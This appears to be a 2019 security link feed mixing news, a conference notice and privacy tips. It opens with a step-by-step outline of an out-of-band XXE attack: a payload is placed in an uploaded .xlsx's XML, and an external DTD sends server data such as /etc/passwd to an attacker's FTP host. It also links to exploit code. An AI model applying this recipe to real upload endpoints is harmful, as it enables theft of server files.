Exfiltration through FTP using OOB XXE

Upload accepts .xlsx files --> Unzip sample .xlsx file -> add payload in workbook.xml/[Content_Types].xml after xml declaration --> DTD file send data via ftp://remote-ip/%data --> run ftp server using xxe-ftp-server.rb --> /etc/passwd

Via: https://twitter.com/_ayoubfathi_/status/1164536885244583941

GAME OVER: Detecting and Stopping an APT41 Operation
https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html

Abstracts are received. After evaluating the abstracts and arranging travel and resistance, the details of speakers will be announced.

P0SCon2019

📆 12 Oct 2019

Register for P0SCon2019:

🇮🇷 ::Iranian Citizens::
https://evnd.co/w3uRC

🇺🇳::Non-Iranian Citizens::
Contact: p0scon@uut.ac.ir


http://poscon.ir

@P0SCon

What happens if we use our brain's 100% capacity
https://twitter.com/cyanpiny/status/1175030939891712000

How Edward Snowden Would Use A Smartphone
-Graphene OS
-all traffic through TOR
-use ad-blocker and password manager
-use Signal or Wire
-...
https://www.eva.nmccann.net/blog/snowden-smartphone

Counter-Strike Global Offensive CVE-2019-15943
https://blog.firosolutions.com/exploits/counter-strike-go/

PHP 7.1-7.3 disable_functions bypass
https://github.com/mm0r1/exploits/tree/master/php-json-bypass

Iran's Oil Sector on 'Full Alert' Against Attacks

Iran's oil minister on Sunday ordered his country's energy sector to be on high alert to the threat of "physical and cyber" attacks.

Bijan Namdar Zanganeh said "it is necessary for all companies and installations of the oil industry to be on full alert against physical and cyber threats," in a statement published on the oil ministry's Shana website.
https://www.securityweek.com/irans-oil-sector-full-alert-against-attacks